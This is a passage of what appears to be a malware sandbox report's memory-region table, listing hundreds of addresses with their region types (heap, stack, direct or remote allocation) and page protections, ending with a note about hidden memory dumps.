page read and write
|
||
2A06000
|
direct allocation
|
page read and write
|
||
2315892F000
|
heap
|
page read and write
|
||
8F45000
|
unkown
|
page read and write
|
||
269AF8A5000
|
heap
|
page read and write
|
||
269AF7B4000
|
heap
|
page read and write
|
||
269AFE6A000
|
heap
|
page read and write
|
||
346E000
|
unkown
|
page read and write
|
||
269B007A000
|
heap
|
page read and write
|
||
23158915000
|
heap
|
page read and write
|
||
2A44000
|
heap
|
page read and write
|
||
7FBC000
|
unkown
|
page execute read
|
||
5450000
|
heap
|
page read and write
|
||
2A98000
|
direct allocation
|
page read and write
|
||
2C40000
|
heap
|
page read and write
|
||
269B0D32000
|
heap
|
page read and write
|
||
269B1194000
|
heap
|
page read and write
|
||
2BB65E6D000
|
heap
|
page read and write
|
||
335E000
|
unkown
|
page read and write
|
||
5B3000
|
heap
|
page read and write
|
||
8F50000
|
unkown
|
page read and write
|
||
269AEECE000
|
heap
|
page read and write
|
||
29AD000
|
stack
|
page read and write
|
||
B1D9000
|
trusted library allocation
|
page read and write
|
||
34AF000
|
stack
|
page read and write
|
||
3540000
|
heap
|
page read and write
|
||
1F5A49D1000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2D03000
|
heap
|
page read and write
|
||
92A5000
|
unkown
|
page readonly
|
||
2E10000
|
heap
|
page read and write
|
||
B1B2000
|
trusted library allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
A3DC000
|
direct allocation
|
page read and write
|
||
2BB65E50000
|
heap
|
page read and write
|
||
2B10000
|
heap
|
page read and write
|
||
A45E000
|
direct allocation
|
page read and write
|
||
2BB65E30000
|
remote allocation
|
page read and write
|
||
269AF89D000
|
heap
|
page read and write
|
||
2C90000
|
heap
|
page read and write
|
||
3260000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2C70000
|
heap
|
page read and write
|
||
269AF8B8000
|
heap
|
page read and write
|
||
2C10000
|
heap
|
page read and write
|
||
8F8B000
|
unkown
|
page write copy
|
||
2A31000
|
direct allocation
|
page read and write
|
||
9312000
|
unkown
|
page readonly
|
||
D543000
|
heap
|
page read and write
|
||
2C5E000
|
unkown
|
page read and write
|
||
29E7000
|
direct allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269AF184000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
269AFDA4000
|
heap
|
page read and write
|
||
9407000
|
unkown
|
page readonly
|
||
269B146C000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2EF6000
|
heap
|
page read and write
|
||
2A6C000
|
direct allocation
|
page read and write
|
||
269AF310000
|
heap
|
page read and write
|
||
AFD000
|
unkown
|
page read and write
|
||
269B0E7C000
|
heap
|
page read and write
|
||
670000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
30B6000
|
heap
|
page read and write
|
||
269B0668000
|
heap
|
page read and write
|
||
A092000
|
direct allocation
|
page read and write
|
||
5EBC000
|
unkown
|
page execute read
|
||
2F03000
|
heap
|
page read and write
|
||
2FBF000
|
unkown
|
page read and write
|
||
269AF208000
|
heap
|
page read and write
|
||
E48000
|
heap
|
page read and write
|
||
269AFA4A000
|
heap
|
page read and write
|
||
2A43000
|
heap
|
page read and write
|
||
269B02CC000
|
heap
|
page read and write
|
||
269AFFF6000
|
heap
|
page read and write
|
||
29BF000
|
unkown
|
page read and write
|
||
D49F000
|
stack
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
ECF000
|
heap
|
page read and write
|
||
269AF2CE000
|
heap
|
page read and write
|
||
2CD0000
|
heap
|
page read and write
|
||
2B2C000
|
heap
|
page read and write
|
||
269AF8B5000
|
heap
|
page read and write
|
||
2D24000
|
heap
|
page read and write
|
||
269B0FC7000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269B0F43000
|
heap
|
page read and write
|
||
269AF8C8000
|
heap
|
page read and write
|
||
D960000
|
remote allocation
|
page read and write
|
||
269AFA08000
|
heap
|
page read and write
|
||
3573000
|
heap
|
page read and write
|
||
A3D2000
|
direct allocation
|
page read and write
|
||
269B0E3B000
|
heap
|
page read and write
|
||
269B0F00000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
231588E0000
|
heap
|
page read and write
|
||
AB6000
|
unkown
|
page read and write
|
||
D5A0000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269B1194000
|
heap
|
page read and write
|
||
269B0D33000
|
heap
|
page read and write
|
||
B1EE000
|
stack
|
page read and write
|
||
2AB5000
|
direct allocation
|
page read and write
|
||
D4B3000
|
heap
|
page read and write
|
||
269B00BC000
|
heap
|
page read and write
|
||
AB3000
|
unkown
|
page read and write
|
||
269AF8BE000
|
heap
|
page read and write
|
||
269B129C000
|
heap
|
page read and write
|
||
269B0BE8000
|
heap
|
page read and write
|
||
269AFC5A000
|
heap
|
page read and write
|
||
2E59000
|
heap
|
page read and write
|
||
B4CE000
|
direct allocation
|
page read and write
|
||
269A965D000
|
heap
|
page read and write
|
||
2CA0000
|
heap
|
page read and write
|
||
269B11D6000
|
heap
|
page read and write
|
||
2CFD000
|
stack
|
page read and write
|
||
C9A0000
|
trusted library allocation
|
page read and write
|
||
269AF8B8000
|
heap
|
page read and write
|
||
269A96D9000
|
heap
|
page read and write
|
||
269B0182000
|
heap
|
page read and write
|
||
DEA000
|
heap
|
page read and write
|
||
73DB000
|
unkown
|
page execute read
|
||
269AF8BA000
|
heap
|
page read and write
|
||
31B0000
|
heap
|
page read and write
|
||
2BB65EE5000
|
heap
|
page read and write
|
||
23158986000
|
heap
|
page read and write
|
||
269AF05A000
|
heap
|
page read and write
|
||
6F87F000
|
unkown
|
page read and write
|
||
23158910000
|
heap
|
page read and write
|
||
34CF000
|
stack
|
page read and write
|
||
269A99F1000
|
heap
|
page read and write
|
||
B1B6000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
2BED000
|
stack
|
page read and write
|
||
269AF8D4000
|
heap
|
page read and write
|
||
3200000
|
heap
|
page read and write
|
||
291D000
|
stack
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
34B0000
|
heap
|
page read and write
|
||
931F000
|
unkown
|
page readonly
|
||
269AF8CC000
|
heap
|
page read and write
|
||
2B53000
|
heap
|
page read and write
|
||
B16000
|
unkown
|
page read and write
|
||
8F88000
|
unkown
|
page read and write
|
||
2D63000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
E16000
|
heap
|
page read and write
|
||
269AF9C6000
|
heap
|
page read and write
|
||
269AF8C6000
|
heap
|
page read and write
|
||
928A000
|
unkown
|
page readonly
|
||
B1CA000
|
trusted library allocation
|
page read and write
|
||
2315894A000
|
heap
|
page read and write
|
||
269B104B000
|
heap
|
page read and write
|
||
269AF8CF000
|
heap
|
page read and write
|
||
269AF89D000
|
heap
|
page read and write
|
||
2CE0000
|
heap
|
page read and write
|
||
D53D000
|
heap
|
page read and write
|
||
2F03000
|
heap
|
page read and write
|
||
269B0392000
|
heap
|
page read and write
|
||
2BB65E58000
|
heap
|
page read and write
|
||
2E53000
|
heap
|
page read and write
|
||
A0C1000
|
direct allocation
|
page read and write
|
||
269B146F000
|
heap
|
page read and write
|
||
269AF8A0000
|
heap
|
page read and write
|
||
269AEE8C000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
D9972FE000
|
stack
|
page read and write
|
||
269AFA8D000
|
heap
|
page read and write
|
||
B29000
|
unkown
|
page read and write
|
||
2D1F000
|
unkown
|
page read and write
|
||
D50000
|
heap
|
page read and write
|
||
942A000
|
unkown
|
page readonly
|
||
269AFE28000
|
heap
|
page read and write
|
||
269AF7F6000
|
heap
|
page read and write
|
||
2B53000
|
heap
|
page read and write
|
||
2A10000
|
heap
|
page read and write
|
||
2315898D000
|
heap
|
page read and write
|
||
3130000
|
heap
|
page read and write
|
||
2315A404000
|
heap
|
page read and write
|
||
D534000
|
heap
|
page read and write
|
||
2D24000
|
heap
|
page read and write
|
||
269B0206000
|
heap
|
page read and write
|
||
A075000
|
direct allocation
|
page read and write
|
||
269B0F84000
|
heap
|
page read and write
|
||
269B0458000
|
heap
|
page read and write
|
||
269B0E3A000
|
heap
|
page read and write
|
||
657A000
|
unkown
|
page execute read
|
||
1F5A6310000
|
heap
|
page read and write
|
||
2BB65E95000
|
heap
|
page read and write
|
||
EC3000
|
heap
|
page read and write
|
||
2C60000
|
heap
|
page read and write
|
||
269AF984000
|
heap
|
page read and write
|
||
269AFDE6000
|
heap
|
page read and write
|
||
2A44000
|
heap
|
page read and write
|
||
269B05E4000
|
heap
|
page read and write
|
||
32B0000
|
heap
|
page read and write
|
||
A2AE000
|
direct allocation
|
page read and write
|
||
306F000
|
unkown
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
ADF000
|
unkown
|
page write copy
|
||
9064000
|
unkown
|
page write copy
|
||
2FF4000
|
heap
|
page read and write
|
||
2A65000
|
direct allocation
|
page read and write
|
||
269B1320000
|
heap
|
page read and write
|
||
D960000
|
remote allocation
|
page read and write
|
||
936C000
|
unkown
|
page readonly
|
||
C7100FE000
|
stack
|
page read and write
|
||
C8EE000
|
stack
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2E60000
|
heap
|
page read and write
|
||
269AF8CA000
|
heap
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
C7105FD000
|
stack
|
page read and write
|
||
269B143F000
|
heap
|
page read and write
|
||
269B1110000
|
heap
|
page read and write
|
||
604000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269B1428000
|
heap
|
page read and write
|
||
269AF8C5000
|
heap
|
page read and write
|
||
30C0000
|
heap
|
page read and write
|
||
2A2A000
|
direct allocation
|
page read and write
|
||
269B0C2A000
|
heap
|
page read and write
|
||
269AF942000
|
heap
|
page read and write
|
||
269AF562000
|
heap
|
page read and write
|
||
269AF8A3000
|
heap
|
page read and write
|
||
2BB65EE6000
|
heap
|
page read and write
|
||
23158931000
|
heap
|
page read and write
|
||
2F03000
|
heap
|
page read and write
|
||
269B108C000
|
heap
|
page read and write
|
||
1F5A49E6000
|
heap
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
23158997000
|
heap
|
page read and write
|
||
2B70000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
5DC000
|
heap
|
page read and write
|
||
269AF901000
|
heap
|
page read and write
|
||
930C000
|
unkown
|
page readonly
|
||
269AF66A000
|
heap
|
page read and write
|
||
2B40000
|
heap
|
page read and write
|
||
269AEDFF000
|
heap
|
page read and write
|
||
269AF208000
|
heap
|
page read and write
|
||
269AFF30000
|
heap
|
page read and write
|
||
269AFC5A000
|
heap
|
page read and write
|
||
A0DE000
|
direct allocation
|
page read and write
|
||
B4CE000
|
direct allocation
|
page read and write
|
||
269A965A000
|
heap
|
page read and write
|
||
2D04000
|
heap
|
page read and write
|
||
31AF000
|
stack
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
269B0A1A000
|
heap
|
page read and write
|
||
2B6E000
|
stack
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
93F7000
|
unkown
|
page readonly
|
||
2B80000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269A9AF0000
|
heap
|
page read and write
|
||
B1CA000
|
trusted library allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2FF3000
|
heap
|
page read and write
|
||
269AF8BE000
|
heap
|
page read and write
|
||
A11B000
|
direct allocation
|
page read and write
|
||
A4EB000
|
direct allocation
|
page read and write
|
||
9427000
|
unkown
|
page readonly
|
||
2CA2000
|
heap
|
page read and write
|
||
269A9635000
|
heap
|
page read and write
|
||
269AF1C7000
|
heap
|
page read and write
|
||
269AF09C000
|
heap
|
page read and write
|
||
269AF8C6000
|
heap
|
page read and write
|
||
269AF8A7000
|
heap
|
page read and write
|
||
269AF8D4000
|
heap
|
page read and write
|
||
C7103FE000
|
stack
|
page read and write
|
||
2A39000
|
direct allocation
|
page read and write
|
||
269AEF11000
|
heap
|
page read and write
|
||
EC6000
|
heap
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
744B000
|
unkown
|
page execute read
|
||
269A9FEF000
|
heap
|
page read and write
|
||
1F5A49B0000
|
heap
|
page read and write
|
||
9391000
|
unkown
|
page readonly
|
||
269AF894000
|
heap
|
page read and write
|
||
2B0E000
|
unkown
|
page read and write
|
||
906C000
|
unkown
|
page read and write
|
||
58C000
|
heap
|
page read and write
|
||
8F69000
|
unkown
|
page read and write
|
||
335F000
|
unkown
|
page read and write
|
||
2A43000
|
heap
|
page read and write
|
||
B434000
|
direct allocation
|
page read and write
|
||
269AF8B0000
|
heap
|
page read and write
|
||
D58C000
|
heap
|
page read and write
|
||
2E40000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2BB65E71000
|
heap
|
page read and write
|
||
269AED84000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
A114000
|
direct allocation
|
page read and write
|
||
2BB65E40000
|
heap
|
page read and write
|
||
269AF8B5000
|
heap
|
page read and write
|
||
E7D000
|
heap
|
page read and write
|
||
269AF8B8000
|
heap
|
page read and write
|
||
269AF09C000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
3110000
|
heap
|
page read and write
|
||
2E50000
|
heap
|
page read and write
|
||
269B0626000
|
heap
|
page read and write
|
||
B1B0000
|
trusted library allocation
|
page read and write
|
||
E87000
|
heap
|
page read and write
|
||
32FC000
|
stack
|
page read and write
|
||
269AEF94000
|
heap
|
page read and write
|
||
2DEF000
|
unkown
|
page read and write
|
||
269AEF10000
|
heap
|
page read and write
|
||
B430000
|
direct allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
92D6000
|
unkown
|
page readonly
|
||
2BB65E95000
|
heap
|
page read and write
|
||
269AF49C000
|
heap
|
page read and write
|
||
5B3000
|
heap
|
page read and write
|
||
E16000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269AF562000
|
heap
|
page read and write
|
||
269B0248000
|
heap
|
page read and write
|
||
269AF89F000
|
heap
|
page read and write
|
||
269B0668000
|
heap
|
page read and write
|
||
2FF3000
|
heap
|
page read and write
|
||
3150000
|
heap
|
page read and write
|
||
269B0DF8000
|
heap
|
page read and write
|
||
1CBF7FF000
|
stack
|
page read and write
|
||
269AF8D7000
|
heap
|
page read and write
|
||
2D23000
|
heap
|
page read and write
|
||
269B07B2000
|
heap
|
page read and write
|
||
269B13A4000
|
heap
|
page read and write
|
||
1F5A4810000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2D23000
|
heap
|
page read and write
|
||
9322000
|
unkown
|
page readonly
|
||
9376000
|
unkown
|
page readonly
|
||
3510000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269B007A000
|
heap
|
page read and write
|
||
3040000
|
heap
|
page read and write
|
||
1F5A49EB000
|
heap
|
page read and write
|
||
269B0F84000
|
heap
|
page read and write
|
||
B1C000
|
unkown
|
page read and write
|
||
1F5A49ED000
|
heap
|
page read and write
|
||
269B0770000
|
heap
|
page read and write
|
||
2D3E000
|
stack
|
page read and write
|
||
C7107FE000
|
stack
|
page read and write
|
||
B4CC000
|
direct allocation
|
page read and write
|
||
8F76000
|
unkown
|
page read and write
|
||
92CF000
|
unkown
|
page readonly
|
||
1F5A49FC000
|
heap
|
page read and write
|
||
D4CB000
|
heap
|
page read and write
|
||
269AF8CA000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269AFCDE000
|
heap
|
page read and write
|
||
2C8E000
|
stack
|
page read and write
|
||
269AF1C6000
|
heap
|
page read and write
|
||
269B0A5C000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269B0A9E000
|
heap
|
page read and write
|
||
269B1480000
|
heap
|
page read and write
|
||
269A9698000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269AF8CC000
|
heap
|
page read and write
|
||
269B11D7000
|
heap
|
page read and write
|
||
2EF0000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
92C8000
|
unkown
|
page readonly
|
||
A4D5000
|
direct allocation
|
page read and write
|
||
92EB000
|
unkown
|
page readonly
|
||
2BB65EB3000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
C7108FB000
|
stack
|
page read and write
|
||
269A96D9000
|
heap
|
page read and write
|
||
269A9664000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
8F87000
|
unkown
|
page write copy
|
||
D4BD000
|
heap
|
page read and write
|
||
3574000
|
heap
|
page read and write
|
||
269AF8B8000
|
heap
|
page read and write
|
||
269B1485000
|
heap
|
page read and write
|
||
3253000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
5FD000
|
stack
|
page read and write
|
||
D51A000
|
heap
|
page read and write
|
||
A5BC000
|
stack
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
2CA4000
|
heap
|
page read and write
|
||
269A966B000
|
heap
|
page read and write
|
||
269AFF72000
|
heap
|
page read and write
|
||
2E53000
|
heap
|
page read and write
|
||
8F83000
|
unkown
|
page read and write
|
||
92C5000
|
unkown
|
page readonly
|
||
A08A000
|
direct allocation
|
page read and write
|
||
2BB65E00000
|
heap
|
page read and write
|
||
B1B6000
|
trusted library allocation
|
page read and write
|
||
6C96000
|
unkown
|
page execute read
|
||
760000
|
heap
|
page read and write
|
||
269AEECE000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269B1428000
|
heap
|
page read and write
|
||
309C000
|
heap
|
page read and write
|
||
41C000
|
unkown
|
page execute read
|
||
E83000
|
heap
|
page read and write
|
||
D5A3000
|
heap
|
page read and write
|
||
A17A000
|
direct allocation
|
page read and write
|
||
B1D9000
|
trusted library allocation
|
page read and write
|
||
23158880000
|
heap
|
page read and write
|
||
7816000
|
unkown
|
page execute read
|
||
5B3000
|
heap
|
page read and write
|
||
9316000
|
unkown
|
page readonly
|
||
2D23000
|
heap
|
page read and write
|
||
935D000
|
unkown
|
page readonly
|
||
2B80000
|
heap
|
page read and write
|
||
269AF8D5000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
9285000
|
unkown
|
page readonly
|
||
269AF87A000
|
heap
|
page read and write
|
||
3370000
|
heap
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
269A965D000
|
heap
|
page read and write
|
||
F30000
|
heap
|
page read and write
|
||
269B1363000
|
heap
|
page read and write
|
||
269A966C000
|
heap
|
page read and write
|
||
269A96D9000
|
heap
|
page read and write
|
||
269AFD62000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
9070000
|
unkown
|
page readonly
|
||
D91C000
|
stack
|
page read and write
|
||
93E8000
|
unkown
|
page readonly
|
||
A52B000
|
direct allocation
|
page read and write
|
||
269AF8D8000
|
heap
|
page read and write
|
||
9308000
|
unkown
|
page readonly
|
||
B1C7000
|
trusted library allocation
|
page read and write
|
||
269AF8CA000
|
heap
|
page read and write
|
||
269AF018000
|
heap
|
page read and write
|
||
2D64000
|
heap
|
page read and write
|
||
A0F6000
|
direct allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
8F4C000
|
unkown
|
page write copy
|
||
2B81000
|
heap
|
page read and write
|
||
269AF8A4000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269AF8D5000
|
heap
|
page read and write
|
||
3110000
|
heap
|
page read and write
|
||
30C4000
|
heap
|
page read and write
|
||
A465000
|
direct allocation
|
page read and write
|
||
269AF8B4000
|
heap
|
page read and write
|
||
269B1320000
|
heap
|
page read and write
|
||
935A000
|
unkown
|
page readonly
|
||
D56C000
|
heap
|
page read and write
|
||
2A56000
|
direct allocation
|
page read and write
|
||
269AF8CA000
|
heap
|
page read and write
|
||
70E000
|
unkown
|
page read and write
|
||
269AF8C5000
|
heap
|
page read and write
|
||
2BB65EA3000
|
heap
|
page read and write
|
||
269B0C2B000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
8F3E000
|
unkown
|
page write copy
|
||
9023000
|
unkown
|
page read and write
|
||
269B1485000
|
heap
|
page read and write
|
||
3510000
|
heap
|
page read and write
|
||
68E7000
|
unkown
|
page execute read
|
||
E71000
|
heap
|
page read and write
|
||
AF80000
|
direct allocation
|
page read and write
|
||
269AF8B8000
|
heap
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
269AF394000
|
heap
|
page read and write
|
||
269B0458000
|
heap
|
page read and write
|
||
8F43000
|
unkown
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
54BB000
|
unkown
|
page execute and read and write
|
||
939D000
|
unkown
|
page readonly
|
||
D39D000
|
stack
|
page read and write
|
||
1F5A4A05000
|
heap
|
page read and write
|
||
2315A8D5000
|
heap
|
page read and write
|
||
54A2000
|
unkown
|
page execute and read and write
|
||
269B01C5000
|
heap
|
page read and write
|
||
F34000
|
heap
|
page read and write
|
||
B1C7000
|
trusted library allocation
|
page read and write
|
||
B1C7000
|
trusted library allocation
|
page read and write
|
There are 1520 hidden memdumps, click here to show them.